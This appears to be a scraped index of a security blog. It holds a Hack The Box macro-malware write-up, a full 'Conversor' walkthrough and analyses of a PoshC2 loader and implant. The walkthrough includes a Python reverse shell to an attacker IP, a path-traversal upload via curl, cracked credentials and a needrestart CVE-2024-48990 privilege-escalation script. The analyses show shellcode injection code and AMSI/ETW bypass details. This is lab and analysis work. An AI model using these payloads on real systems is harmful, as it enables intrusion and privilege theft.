1CALL(\u0026#34;Shell32\u0026#34;,\u0026#34;ShellExecuteA\u0026#34;,\u0026#34;JJCCCCJ\u0026#34;,0,\u0026#34;Open\u0026#34;,\u0026#34;rundll32.exe\u0026#34;,\u0026#34;C:\\rncwner\\CkuiQhTXx.dll...\u0026#34;,0,0) Flag Reconstruction # Analyzing cell R1191 reveals the flag embedded in the rundll32 command line:\nPart 1: Cell D8 (when GET.WORKSPACE(42) = TRUE)\n1\u0026#39; CELL:D8, FullEvaluation, [TRUE] \u0026#34; HTB{n0w_e\u0026#34; Part 2: Hardcoded string\n1\u0026#34;Xc3l_4.0_M4\u0026#34; Part 3: Cell D1023 (when Windows version ≠ 6.1)\n1\u0026#39; CELL:D1023, FullEvaluation, [FALSE] \u0026#34;cr0s_r_b4cK}\u0026#34; Complete flag:\n1HTB{n0w_eXc3l_4.0_M4cr0s_r_b4cK} Attack Flow # %%{init: {'theme': 'base', 'themeVariables': { 'background': '#ffffff', 'mainBkg': '#ffffff', 'primaryTextColor': '#000000', 'lineColor': '#333333', 'clusterBkg': '#ffffff', 'clusterBorder': '#333333'}}}%% graph TD %% --- Styling Definitions --- classDef default fill:#f9f9f9,stroke:#333,stroke-width:1px,color:#000; classDef input fill:#e1f5fe,stroke:#0277bd,stroke-width:2px,color:#000; classDef check fill:#fff9c4,stroke:#fbc02d,stroke-width:2px,stroke-dasharray: 5 5,color:#000; classDef exec fill:#ffebee,stroke:#c62828,stroke-width:2px,color:#000; classDef term fill:#e0e0e0,stroke:#333,stroke-width:2px,color:#000; %% --- Flow Logic --- User([User Opens oBfsC4t10n2.xls]):::input --\u003e|Enable Content| AutoExec[Auto_Open / XLM Macros Start]:::input subgraph Anti_Sandbox [Anti-Sandbox / Evasion] direction TB AutoExec --\u003e CheckOS{Check OSGET.WORKSPACE 1}:::check CheckOS -- \"Contains 'Windows'\" --\u003e CheckAudio{Check AudioGET.WORKSPACE 42}:::check CheckAudio -- \"Audio Present\" --\u003e CheckMouse{Check MouseGET.WORKSPACE 19}:::check %% Fail Conditions CheckOS -.-\u003e|Fail| Close[Close Workbook]:::term CheckAudio -.-\u003e|Fail| Close CheckMouse -.-\u003e|Fail| Close end subgraph Payload_Construction [Payload Construction] CheckMouse ==\u003e|Pass| Deobfuscate[Deobfuscate 
StringsCONCATENATE \u0026 FORMULA.FILL] end subgraph Execution_Chain [Execution Chain] Deobfuscate --\u003e CreateDir[Create DirectoryC:\\rncwner]:::exec CreateDir --\u003e Download[Download DLLURLDownloadToFileA]:::exec Download -- \"http://0b.htb/s.dll\" --\u003e SaveDll[Save PayloadC:\\rncwner\\CkuiQhTXx.dll]:::exec SaveDll --\u003e RunDll[Execute PayloadShellExecuteA]:::exec RunDll -- \"rundll32.exe\" --\u003e Compromise((System Compromised)):::exec end ","date":"January 20, 2026","externalUrl":null,"permalink":"/investigations/htb-obfsc4t10n2/","section":"","summary":"","title":"HTB-oBfsC4t10n2","type":"investigations"},{"content":"","date":"January 20, 2026","externalUrl":null,"permalink":"/tags/oleid/","section":"Tags","summary":"","title":"Oleid","type":"tags"},{"content":"","date":"January 20, 2026","externalUrl":null,"permalink":"/tags/xlm-macros/","section":"Tags","summary":"","title":"Xlm-Macros","type":"tags"},{"content":"","date":"January 20, 2026","externalUrl":null,"permalink":"/tags/xlmdeobfuscator/","section":"Tags","summary":"","title":"Xlmdeobfuscator","type":"tags"},{"content":"","date":"January 19, 2026","externalUrl":null,"permalink":"/tags/cve-2024-48990/","section":"Tags","summary":"","title":"CVE-2024-48990","type":"tags"},{"content":"","date":"January 19, 2026","externalUrl":null,"permalink":"/tags/file-upload/","section":"Tags","summary":"","title":"File-Upload","type":"tags"},{"content":" Difficulty: Easy OS: Linux Date: 2026-01-19 TL;DR # Flask web application vulnerable to path traversal during file uploads. 
Exploited by uploading Python reverse shell to cron-executed directory → gained www-data shell → extracted MD5 hashes from SQLite database → cracked password for user fismathack → leveraged CVE-2024-48990 in needrestart 3.7 for privilege escalation to root.\nRecon # port scanning # nmap identifies 2 open TCP ports: 22 (SSH) and 80 (HTTP)\n1bubka@bubka$ nmap 10.129.4.129 -p- -A --min-rate 5000 2Starting Nmap 7.98 ( https://nmap.org ) at 2026-01-19 06:23 -0500 3Nmap scan report for 10.129.4.129 4Host is up (0.051s latency). 5Not shown: 65533 closed tcp ports (reset) 6PORT STATE SERVICE VERSION 722/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0) 8| ssh-hostkey: 9| 256 01:74:26:39:47:bc:6a:e2:cb:12:8b:71:84:9c:f8:5a (ECDSA) 10|_ 256 3a:16:90:dc:74:d8:e3:c4:51:36:e2:08:06:26:17:ee (ED25519) 1180/tcp open http Apache httpd 2.4.52 12|_http-title: Did not follow redirect to http://conversor.htb/ 13|_http-server-header: Apache/2.4.52 (Ubuntu) 14Device type: general purpose|router 15Running: Linux 5.X, MikroTik RouterOS 7.X 16OS CPE: cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3 17OS details: Linux 5.0 - 5.14, MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) 18Network Distance: 2 hops 19Service Info: Host: conversor.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel 20 21TRACEROUTE (using port 8888/tcp) 22HOP RTT ADDRESS 231 35.97 ms 10.10.14.1 242 35.93 ms 10.129.4.129 25 26OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 
27Nmap done: 1 IP address (1 host up) scanned in 24.69 seconds I added the host domain to my /etc/hosts file.\n1bubka@bubka$ tail -1 /etc/hosts 210.129.4.129 conversor.htb Website Enumeration # The website features a login form.\nClicking \u0026ldquo;Register\u0026rdquo; redirects to a registration page where I created an account.\nThe application converts XML and XSLT files into HTML.\nI downloaded the source code from the \u0026ldquo;About\u0026rdquo; page. 1. 2├── app.py 3├── app.wsgi 4├── install.md 5├── instance 6│ └── users.db 7├── scripts 8├── static 9│ ├── images 10│ │ ├── arturo.png 11│ │ ├── david.png 12│ │ └── fismathack.png 13│ ├── nmap.xslt 14│ └── style.css 15├── templates 16│ ├── about.html 17│ ├── base.html 18│ ├── index.html 19│ ├── login.html 20│ ├── register.html 21│ └── result.html 22└── uploads Source code analysis # The interesting parts are in app.py and install.md. The application is built with Python Flask. In app.py I found that the XSLT file is parsed without the parser configuration that the XML file gets. No filename sanitization was found in the upload handler, enabling path traversal attacks.\napp.py:\n1...[snip]... 2parser = etree.XMLParser(resolve_entities=False, no_network=True, dtd_validation=False, load_dtd=False) 3xml_tree = etree.parse(xml_path, parser) 4xslt_tree = etree.parse(xslt_path) # no parse configuration 5...[snip]... resolve_entities=False (prevents the parser from resolving entities into their values)\nno_network=True (prevents making any network requests during XML processing)\ndtd_validation=False (disables validation of the document against a DTD)\nload_dtd=False (prevents loading an external DTD)\ninstall.md reveals a cron job that executes all Python scripts in /var/www/conversor.htb/scripts/ every minute.\n1...[snip]... 2You can also run it with Apache using the app.wsgi file.
3If you want to run Python scripts (for example, our server deletes all files older than 60 minutes to avoid system overload), you can add the following line to your /etc/crontab. 4\u0026#34;\u0026#34;\u0026#34; 5* * * * * www-data for f in /var/www/conversor.htb/scripts/*.py; do python3 \u0026#34;$f\u0026#34;; done 6\u0026#34;\u0026#34;\u0026#34; 7...[snip]... Exploitation # Attack-Vector: Arbitrary File Upload via Path Traversal to Cron RCE.\nThe application does not sanitize filenames properly. I can upload a Python reverse shell and use path traversal (../scripts/) to save it into the directory executed by the cron job.\n1bubka@bubka$ cat exploit.py 2import socket,subprocess,os 3s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 4s.connect((\u0026#34;10.10.14.80\u0026#34;,5323)) 5os.dup2(s.fileno(),0) 6os.dup2(s.fileno(),1) 7os.dup2(s.fileno(),2) 8import pty; pty.spawn(\u0026#34;/bin/bash\u0026#34;) 9 10bubka@bubka$ curl -X POST http://conversor.htb/convert \\ 11 -F \u0026#34;xml_file=@exploit.py;filename=../scripts/exploit.py\u0026#34; \\ 12 -F \u0026#34;xslt_file=@exploit.py;filename=sex.xsl\u0026#34; \\ 13 -b \u0026#34;session=eyJ1c2VyX2lkIjo1LCJ1c2VybmFtZSI6ImJ1YmthIn0.aW574A.k5FrGy9C5elqfuPqbua7WiA3Img\u0026#34; Shell as www-data # 1bubka@bubla$ nc -lvnp 5323 2listening on [any] 5323 ... 3connect to [10.10.14.80] from (UNKNOWN) [10.129.4.226] 51018 4www-data@conversor:~$ I know that a database exists.
Analyzing users.db revealed the password hashes of the users, including \u0026lsquo;fismathack\u0026rsquo;.\n1www-data@conversor:~$ sqlite3 /var/www/conversor.htb/instance/users.db \u0026#34;SELECT * FROM users;\u0026#34; 2\u0026lt;versor.htb/instance/users.db \u0026#34;SELECT * FROM users;\u0026#34; 31|fismathack|5b5c3ac3a1c897c94caad48e6c71fdec 45|bubka|d6f23513481dcdbb81a197a16ea36c5f Cracking the fismathack MD5 hash:\n1bubka@bubka$ echo \u0026#34;5b5c3ac3a1c897c94caad48e6c71fdec\u0026#34; \u0026gt; hash.txt 2bubka@bubka$ hashcat -m 0 -a 0 hash.txt /usr/share/wordlists/rockyou.txt --show 35b5c3ac3a1c897c94caad48e6c71fdec:Keepmesafeandwarm Shell as fismathack # Logging in over SSH with the password Keepmesafeandwarm:\n1bubka@bubka$ ssh fismathack@conversor.htb 2...[snip]... 3fismathack@conversor:~$ whoami 4fismathack Getting the user flag:\n1fismathack@conversor:~$ cat ~/user.txt 255362fe3efcdfdcc6d8f0b6c474d4b6d Shell as root # 1fismathack@conversor:~$ sudo -l 2Matching Defaults entries for fismathack on conversor: 3 env_reset, mail_badpass, 4 secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin, use_pty 5 6User fismathack may run the following commands on conversor: 7 (ALL : ALL) NOPASSWD: /usr/sbin/needrestart 8 9fismathack@conversor:~$ needrestart --version 10 11needrestart 3.7 - Restart daemons after library updates. 12...[snip]... Checking sudo -l revealed that fismathack can run /usr/sbin/needrestart without a password. The installed version is 3.7. This version is vulnerable to CVE-2024-48990 (Local Privilege Escalation), which allows arbitrary code execution via the -c config flag.\nI wrote a Python script to automate the exploitation:\nCreate a malicious Perl config file that copies /bin/bash and sets the SUID bit.\nExecute sudo needrestart pointing to this config.
Spawn the SUID shell.\npriv.py:\n1#!/usr/bin/env python3 2import os 3import sys 4import subprocess 5 6config = \u0026#34;/tmp/bu.conf\u0026#34; 7shell = \u0026#34;/tmp/bash\u0026#34; 8payload = f\u0026#39;system(\u0026#34;cp /bin/bash {shell} \u0026amp;\u0026amp; chmod 4755 {shell}\u0026#34;);\u0026#39; 9 10try: 11 with open(config, \u0026#34;w\u0026#34;) as f: 12 f.write(payload) 13 14 subprocess.run([\u0026#34;sudo\u0026#34;, \u0026#34;needrestart\u0026#34;, \u0026#34;-c\u0026#34;, config], check=True) 15 16 if os.path.exists(config): 17 os.remove(config) 18 19 if os.path.exists(shell): 20 os.execl(shell, shell, \u0026#34;-p\u0026#34;) 21 22except Exception as e: 23 print(f\u0026#34;Unexpected error: {e}\u0026#34;) 24 sys.exit(1) Root obtained.\n1fismathack@conversor:~$ python3 priv.py 2Scanning processes... 3Scanning linux images... 4 5Running kernel seems to be up-to-date. 6 7No services need to be restarted. 8 9No containers need to be restarted. 10 11No user sessions are running outdated binaries. 12 13No VM guests are running outdated hypervisor (qemu) binaries on this host. 14rootbash-5.1# whoami 15root 16rootbash-5.1# and flag:\n1rootbash-5.1# cat /root/root.txt 22ddbf40c03a3c45866748ea7e8c69444 ","date":"January 19, 2026","externalUrl":null,"permalink":"/investigations/htb-conversor/","section":"","summary":"Flask web application vulnerable to path traversal during file uploads. 
Exploited by uploading Python reverse shell to cron-executed directory → gained www-data shell → extracted MD5 hashes from SQLite database → cracked password for user fismathack → leveraged CVE-2024-48990 in needrestart 3.7 for privilege escalation to root.","title":"HTB-Conversor","type":"investigations"},{"content":"","date":"January 19, 2026","externalUrl":null,"permalink":"/tags/needrestart/","section":"Tags","summary":"","title":"Needrestart","type":"tags"},{"content":"","date":"January 19, 2026","externalUrl":null,"permalink":"/tags/sqlite/","section":"Tags","summary":"","title":"Sqlite","type":"tags"},{"content":"","date":"January 19, 2026","externalUrl":null,"permalink":"/tags/web/","section":"Tags","summary":"","title":"Web","type":"tags"},{"content":" TL;DR # A .NET DLL selects one of two embedded base64-encoded shellcode blobs based on process architecture (x86/x64), decodes it, allocates RWX memory, and executes it via CreateThread. The shellcode performs three evasion steps — NTDLL unhooking, AMSI bypass, and ETW bypass — then executes an embedded PE32 payload identified as a PoshC2 Dropper-cs.exe.\nInitial Analysis # 1Sharp_v4_x64.dll: PE32+ executable (DLL) x86-64 Mono/.Net assembly, 3 sections 2SHA256: 56ed93571e83ca344757d8ce809b5bf8ed5004cdeea92a40ea486b8478b7b26e imports # 3 P/Invoke imports from kernel32.dll used for shellcode injection:\n1VirtualAlloc p/Invoke kernel32.dll 2VirtualProtect p/Invoke kernel32.dll 3CreateThread p/Invoke kernel32.dll This RW→RWX pattern is an indicator of shellcode injection - allocate as writable, write payload, then flip to executable before spawning a thread.\n1PAGE_READWRITE → initial allocation 2PAGE_EXECUTE_READWRITE → after VirtualProtect call Static Analysis # dnSpy # The DLL was decompiled with dnSpy. The Main method contains two large base64 strings — one for x86 (s2) and one for x64 (s). 
Architecture is determined via IntPtr.Size:\n1private static void Main(string[] args) 2{ 3 byte[] array = null; 4 string s = \u0026#34;6AAAAABZSYnISIHBIwsAALpFd2Iw...\u0026#34;; // x64 shellcode 5 string s2 = \u0026#34;6AAAAABYVYnlicIF/wsAAIHC/1MC...\u0026#34;; // x86 shellcode 6...[snip]... The execution flow is: decode base64 -\u0026gt; allocate RW memory -\u0026gt; copy shellcode -\u0026gt; change protection to RWX via VirtualProtect -\u0026gt; execute via CreateThread -\u0026gt; block indefinitely with WaitOne.\n1 if (IntPtr.Size == 4) 2 array = Convert.FromBase64String(s2); 3 else if (IntPtr.Size == 8) 4 array = Convert.FromBase64String(s); 5 6 IntPtr intPtr = Program.VirtualAlloc(IntPtr.Zero, 7 (IntPtr)(array.Length * 2), 8 Program.AllocationType.COMMIT, 9 Program.Protection.PAGE_READWRITE); 10 11 if (intPtr != IntPtr.Zero) 12 { 13 uint num = 0U; 14 uint num2 = 0U; 15 Marshal.Copy(array, 0, intPtr, array.Length); 16 Program.VirtualProtect(intPtr, (IntPtr)(array.Length * 2), 17 Program.Protection.PAGE_EXECUTE_READWRITE, out num); 18 Program.CreateThread(IntPtr.Zero, 0U, intPtr, 19 IntPtr.Zero, 0U, out num2); 20 WaitHandle waitHandle = new EventWaitHandle(false, 21 EventResetMode.ManualReset); 22 waitHandle.WaitOne(); 23 } IDA # Checking strings revealed that the shellcode contains a configuration block that controls which evasion features are enabled at runtime:\n1AMS=1 → AMSI bypass enabled 2ETW=1 → ETW bypass enabled 3NTD=0 → NTDLL unhooking disabled 4DLL=1 → DLL mode 5SLP=0 → Sleep evasion disabled NTDLL Unhooking # The shellcode contains a function that bypasses EDR/AV hooks by replacing the in-memory ntdll.dll .text section with a clean copy loaded directly from disk via LoadLibraryEx with flag 0x80000000 (map as data file, not executed). 
This restores any syscall stubs that may have been patched with EDR trampolines back to their original bytes.\nAMSI Bypass # The shellcode locates AmsiScanBuffer in memory and patches its entry point with a ret instruction, causing all subsequent AMSI scan calls to return immediately without scanning.\nETW Bypass # The shellcode locates EtwEventWrite in ntdll and patches its first byte with 0xC3 (ret), disabling Event Tracing for Windows and preventing the OS from logging telemetry about shellcode execution.\nEmbedded PE # The shellcode contains an embedded base64-encoded PE identified by the TVqQ magic header (MZ signature):\n1seg000:000000000001BA58 TVqQAAMAAAAEAAAA/AALgAAAA... Extracted with Python:\n1import base64 2import re 3 4with open(\u0026#34;mw.bin\u0026#34;, \u0026#34;rb\u0026#34;) as f: 5 data = f.read() # raw shellcode dump 6 7m = re.search(b\u0026#39;TVqQAAMAAAAEAAAA[A-Za-z0-9+/=]+\u0026#39;, data) # base64 run starting at the MZ header 8pe = base64.b64decode(m.group(0)) 9 10with open(\u0026#34;mw_extracted.exe\u0026#34;, \u0026#34;wb\u0026#34;) as out: 11 out.write(pe) 1$ file mw_extracted.exe 2mw_extracted.exe: PE32 executable (console) Intel i386 Mono/.Net assembly, 3 sections SHA256 comparison confirmed this is identical to the previously analyzed Dropper-cs.exe — full analysis available here:\n18e5eeb667a962dbee803572f951d08a65c67a42ecb6d6eaf8ebaaf3681e26154 mw_extracted.exe 28e5eeb667a962dbee803572f951d08a65c67a42ecb6d6eaf8ebaaf3681e26154 dropper_cs.exe IOCs # Files\nSharp_v4_x64.dll — .NET shellcode loader\n- SHA256: 56ed93571e83ca344757d8ce809b5bf8ed5004cdeea92a40ea486b8478b7b26e\nmw_extracted.exe — embedded PoshC2 dropper\n- SHA256: 8e5eeb667a962dbee803572f951d08a65c67a42ecb6d6eaf8ebaaf3681e26154\nAttack Flow # %%{init: {'theme': 'base', 'themeVariables': { 'background': '#ffffff', 'mainBkg': '#ffffff', 'primaryTextColor': '#000000', 'lineColor': '#333333', 'clusterBkg': '#ffffff', 'clusterBorder': '#333333'}}}%% graph TD classDef default fill:#f9f9f9,stroke:#333,stroke-width:1px,color:#000; classDef 
input fill:#e1f5fe,stroke:#0277bd,stroke-width:2px,color:#000; classDef check fill:#fff9c4,stroke:#fbc02d,stroke-width:2px,stroke-dasharray: 5 5,color:#000; classDef exec fill:#ffebee,stroke:#c62828,stroke-width:2px,color:#000; classDef term fill:#e0e0e0,stroke:#333,stroke-width:2px,color:#000; Load([Sharp_v4_x64.dll Loaded]):::input --\u003e Main[Main - Entrypoint]:::input subgraph Shellcode_Selection [Shellcode Selection] Main --\u003e ArchCheck{IntPtr.Size}:::check ArchCheck -- \"== 4 (x86)\" --\u003e DecodeX86[FromBase64String s2]:::exec ArchCheck -- \"== 8 (x64)\" --\u003e DecodeX64[FromBase64String s]:::exec end subgraph Injection [Memory Injection] DecodeX86 --\u003e Alloc[VirtualAlloc RW]:::exec DecodeX64 --\u003e Alloc Alloc --\u003e Copy[Marshal.Copy shellcode to memory]:::exec Copy --\u003e Protect[VirtualProtect → RWX]:::exec Protect --\u003e Thread[CreateThread]:::exec end subgraph Evasion [Evasion] Thread --\u003e NTD{NTD=0}:::check NTD -- Enabled --\u003e Unhook[NTDLL Unhookingreplace .text from disk]:::exec NTD -- Disabled --\u003e AMSI Unhook --\u003e AMSI{AMS=1}:::check AMSI -- Enabled --\u003e AMSIPatch[AmsiScanBuffer → ret]:::exec AMSI -- Disabled --\u003e ETW AMSIPatch --\u003e ETW{ETW=1}:::check ETW -- Enabled --\u003e ETWPatch[EtwEventWrite → ret]:::exec ETW -- Disabled --\u003e PE ETWPatch --\u003e PE end subgraph Payload [Embedded Payload] PE[Extract embedded PETVqQ base64]:::exec --\u003e Dropper((Dropper-cs.exePoshC2)):::exec end ","date":"November 25, 2025","externalUrl":null,"permalink":"/investigations/poschc2-sharp_v4_x64.dll/","section":"","summary":"A .NET DLL decodes architecture-specific shellcode from an embedded base64 string, allocates executable memory, and spawns a thread to execute it. 
The shellcode performs NTDLL unhooking, AMSI and ETW patching before executing an embedded PE payload identified as a PoshC2 dropper.","title":"PoshC2: Sharp_v4_x64.dll","type":"investigations"},{"content":"","date":"November 23, 2025","externalUrl":null,"permalink":"/tags/poshc2/","section":"Tags","summary":"","title":"PoshC2","type":"tags"},{"content":" TL;DR # dropper_cs.exe is a PoshC2 C# implant. An AES-encrypted C2 configuration is embedded directly in the binary, decrypted at runtime to reveal the C2 address, beacon interval, session key, and URI pattern. The implant contacts 192.168.248.128:443, sending an AES-encrypted system fingerprint disguised as a SessionID cookie. Outbound data is padded with real image bytes to evade network inspection. All communication is encrypted with AES-CBC and SSL validation is disabled to allow self-signed certificates.\nOnce staging completes, the implant enters an indefinite beacon loop (KillDate: 2999-01-01), polling the C2 every 5 seconds ±20% jitter for commands. It supports 13+ commands including in-memory assembly execution, live reconfiguration, modular payload loading via Stage2-Core.exe, and named pipe communication for lateral movement. 
All operations are fileless — nothing is written to disk.\n1SHA256 8E5EEB667A962DBEE803572F951D08A65C67A42ECB6D6EAF8EBAAF3681E26154 2Family PoshC2 — C# implant 3C2 https://192.168.248.128 4URI /vfe01s/1/vsopts.js/?c 5BeaconSleep 5s ± 20% jitter 6KillDate 2999-01-01 7Encryption AES-CBC, 256-bit key initial analysis # 1$ file * 2dropper_cs.exe: PE32 executable for MS Windows 4.00 (console), Intel i386 Mono/.Net assembly, 3 sections SHA256: 8E5EEB667A962DBEE803572F951D08A65C67A42ECB6D6EAF8EBAAF3681E26154\nlibraries # Confirmed that this is a .NET executable by the large number of mscoree.dll (Microsoft .NET Runtime Execution Engine) imports # 1VirtualProtect KERNEL32.dll 2GetCurrentThread KERNEL32.dll 3TerminateThread KERNEL32.dll 4GetConsoleWindow KERNEL32.dll - VirtualProtect + PAGE_EXECUTE_READWRITE field: marks memory regions as executable, shellcode injection technique\n- GetConsoleWindow + ShowWindow(SW_HIDE): hides console window from user\n1Load mscoree.dll (runtime) 2CreateDomain, DoCallBack, Unload mscoree.dll (runtime) 3RunEphemeralAssembly, ActivateLoader mscoree.dll (runtime) 4RunTempAppDomain, RunAssembly mscoree.dll (runtime) - loads and executes assemblies directly from bytes, never touching disk\n1Beacon, BeaconSleepMillis, Jitter mscoree.dll (C2 logic) 2GenerateUri, StageUrl, URIs mscoree.dll (C2 logic) 3GetCommands, SendTaskOutputString mscoree.dll (C2 logic) 4DownloadString, UploadData System.Net (WebClient) - beacon loop: sleep with jitter -\u0026gt; contact C2 -\u0026gt; receive commands -\u0026gt; send output\n- GenerateUri: randomizes request URLs to evade pattern-based detection\n1ProxyUrl, ProxyUser, ProxyPassword mscoree.dll (config) 2UserAgent, HttpReferrer mscoree.dll (config) 3set_ServerCertificateValidationCallback System.Net 4AllowUntrustedCertificates mscoree.dll - custom User-Agent, Referrer, proxy support\n- SSL certificate validation disabled: allows self-signed C2 certs, MITM-friendly\n1PadWithImageData, ImageDataObfuscator mscoree.dll 
(C2 logic) 2Images, ExtractImages mscoree.dll (config) - steganography: C2 traffic disguised as image data\n1RijndaelManaged, AesCryptoServiceProvider System.Security.Cryptography 2Encrypt, Decrypt, CreateEncryptor mscoree.dll 3Key, GenerateIV mscoree.dll - AES encryption of all C2 traffic\n1GetEnvironmentalInfo, GetCurrentProcess mscoree.dll / System.Diagnostics 2get_UserName, get_UserDomainName System 3IsHighIntegrity, WindowsPrincipal.IsInRole System.Security.Principal 4GetEnvironmentVariable System - system reconnaissance: username, domain, process name, PID\n- IsHighIntegrity: checks for admin/SYSTEM privileges\nstrings # 1PAGE_EXECUTE_READWRITE 2SW_HIDE 3MULTI_COMMAND_PREFIX 4COMMAND_SEPARATOR - PAGE_EXECUTE_READWRITE - VirtualProtect constant, confirms shellcode injection capability\n- SW_HIDE — hides console window on startup\n- MULTI_COMMAND_PREFIX / COMMAND_SEPARATOR — supports batched command execution from C2\n1reversedBase64Config 2!d-3dion@LD!-d hardcoded key (used in PoshC2) 3==wFR4yT0nuXyBLNH... reversed base64 ~600 chars (offset 0x04B25DE9) 4sI1bBV0hgqeoBBbXa/KqQx8... 
base64 (offset 0x04B2629C) - large reversed base64 blob (~600 chars) — embedded encrypted C2 configuration\n1run-exe command 2run-dll command 3run-temp-appdomain command 4update-config command 5load-module command 6run-dll-background command 7run-exe-background command 8run-assembly-background command 9set-delegates command 10download-file command 11run-assembly command 12beacon command 13exit command 14multicmd command prefix - full C2 command dispatcher confirmed\n- run-assembly / run-exe / run-dll — arbitrary in-memory code execution\n- run-*-background — background task execution in separate threads\n- load-module — dynamic loading of new modules pushed from C2\n- download-file — exfiltration or additional staging\n- update-config — live reconfiguration\n1{0}/{1}{2}/?{3} URL format string 2SessionID={0} cookie/param 3Host 4User-Agent 5Referer - URL template {0}/{1}{2}/?{3} — randomized C2 URL generation to evade pattern detection\n- SessionID in cookie — mimics legitimate web session to blend into normal traffic\nOverall conclusion: Strings confirm and extend the picture from imports — this is a PoshC2 C# implant (Stager/Dropper):\nTwo-stage architecture: this binary is the stager, loads Stage2-Core.exe entirely in memory Embedded encrypted config: large base64 blob with C2 parameters, decoded via reverse + AES Full command loop: 13+ commands including live config update and modular payload loading Traffic masking: SessionID cookie, custom HTTP headers, randomized URL patterns Operational security: KillDate enforced, temporary AppDomains, all operations fileless running in Sandbox # Ran ANY.RUN sandbox with Fake Net enabled. Sample sends 2 HTTP requests over ~40 seconds (beacon interval). 
- URL pattern /vfe01s/1/vsopts.js/?c directly matches hardcoded format string {0}/{1}{2}/?{3}\nHTTP Request:\n1URL /vfe01s/1/vsopts.js/?c 2Protocol HTTP/1.1 3Method GET 4Cookie SessionID=nINTTfojq1v9MITeQO+JRekWX1/+Nqc6/BMwBNX6MaW6Wr 5 PdAzMWsLM/mYMLtMCokYOzh0jpmBMmDUCxfkytXVuMqxpQ/IECzNPp 6 KiI2ia/3OdtLwM8Qjk6mdnBJyza 7User-Agent Mozilla/5.0 (Windows NT 10.0; Win64; x64) 8 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 Safari/537.36 9Host 192.168.248.128 10Connection Keep-Alive - uses legitimate Chrome User-Agent - this is the initial beacon fingerprint sent to C2 on first check-in\n- outbound TCP to 192.168.248.128:443 initiated 1288ms after process start - traffic over port 443 (HTTPS)\nreversing in dnSpy # Started analysis from Main() function, which calls Sharp().\n1public static void Main() 2{ 3 Program.Sharp(0L, 0L); 4} anti-analysis # The Sharp() function starts by hiding the console window.\n1public static void Sharp(long callbackFunc = 0L, long baseAddress = 0L) 2{ 3 Internals.ShowWindow(Internals.GetConsoleWindow(), 0); 4 byte[] array = new byte[0]; 5...[snip]... Next it performs an anti-debug check built on a try/catch block. If the debugger is not attached, it triggers a divide-by-zero exception, which is caught by the catch (Exception) block where the main code begins execution. If the debugger is attached, no exception is thrown and the implant proceeds with an empty config, effectively disabling itself.\n1try 2{ 3 IntPtr intPtr = new IntPtr(0L); 4 long num; 5 if (Debugger.IsAttached) 6 { 7 num = baseAddress; 8 } 9 else 10 { 11 num = baseAddress / intPtr.ToInt64(); // intentional divide-by-zero 12 } 13 array = Encoding.BigEndianUnicode.GetBytes(num.ToString()); 14} 15catch (Exception) 16...[snip]... Inside the catch block, the Config() constructor is called with hardcoded encrypted data.\n1try 2{ 3...[snip]... 
4 Config config = new Config(\u0026#34;==wFR4yT0nuXyBLNHGAHcm51H/B3CjLNxlp6/k3YhokMiGKy4cWkNtmW6Werm1nHWI4yPTbEchk4pGl54J4YH+d43Edan+kOVjPF/wMkpp7Jc3uXiBjCNEJSQNlNHL6ouI06gjISjsdqPTcLLN2JKAxYLSDtAUkarsF6AVXWknO4DYtUCO2xvwQvf43y4cdLNpuDhVUZv1P3emAcfl1EEA83qYGqIxiJsXvaVR/Nxgrl2/jqVO9XtBEMRkJgP/3JrTPgxp3P3kqIu0/WZvp7YApAXQTO8HRir077rNlcXOxqo1/jVsMTSSk3yiIv7nvmQfyMM/fCTp3o4Oeo6Bq/8/A3RH6gPB4sqNXhU4kVSQerYkP4dSKrKR+jfDYfKqr26TQuduOTcEI9E3tVvZXvZaWqDVUtvFdLviPO89B4Uzs5Wz9S709m91DLFgU0PDlubKyTPmR1qyM4JclfJbW9a60YdYsIm346hq38+Y2IHroOJUhmufrnXAHeX0yTmGq8nNGDpnQm8DpGm4At4MjdSgK0YW6HRWRYB4yoU07cv4hvZPvhXCChNk+fl4i9RDwcj7YtrY7fR4Nw+1us/nE6fsfM\u0026#34;, \u0026#34;sI1bBV0hgqeoBBbXa/KqQx8FSWe/jqKFF9TBxehGxxc=\u0026#34;); 5 Program.Init(config); 6...[snip]... 7} 8catch (Exception ex) Config(config, key) receives the encrypted config as a reversed base64 string. the string is first reversed, then passed along with the key to Decrypt(). the decrypted result contains another base64 string which is decoded again, producing plaintext that is passed to ParseConfigString(). Decrypt() extracts the first 16 bytes from the decrypted data as the IV, then constructs the cipher via CreateAlgorithm(key, iv). CreateAlgorithm() implements AES-CBC with a 128-bit block size and 256-bit key. 
To extract the plaintext config, a Python script was written to replicate the C# decryption logic: - reverse the base64 string - decode base64 → ciphertext bytes - first 16 bytes = IV, remaining bytes = ciphertext - decode key from base64 - decrypt using AES-CBC - decode result as base64 once more to get plaintext config\n1from Crypto.Cipher import AES 2import base64 3 4rev_b64 = (\u0026#34;==wFR4yT0nuXyBL...fsfM\u0026#34;) 5b64_key = \u0026#34;sI1bBV0hgqeoBBbXa/KqQx8FSWe/jqKFF9TBxehGxxc=\u0026#34; 6 7b64 = rev_b64[::-1] 8ciphertext = base64.b64decode(b64) 9 10iv = ciphertext[:16] 11ct = ciphertext[16:] 12 13key = base64.b64decode(b64_key) 14 15cipher = AES.new(key, AES.MODE_CBC, iv) 16dec = cipher.decrypt(ct) 17 18dec = dec.rstrip(b\u0026#39;\\x00\u0026#39;) 19text = dec.decode(\u0026#39;utf-8\u0026#39;) 20raw = base64.b64decode(text) 21config = raw.decode(\u0026#39;utf-8\u0026#39;) 22 23print(config) config decryption result # Running the decryption script against the embedded config produces the following plaintext:\n1true;30;60;;;;;TW96aWxsYS81LjAg...;;2999-01-01;1;https://192.168.248.128,;https://192.168.248.128,;;;/vfe01s/1/vsopts.js/?c;;5s;0.2;Qqz6czYCfkrmlba4dF16YLO1vJq13piIlFlN+5o06/g=;;; parsed config fields:\n1RetriesEnabled true 2RetryLimit 30 3StageWaitTimeMillis 60 4UserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64) 5 AppleWebKit/537.36 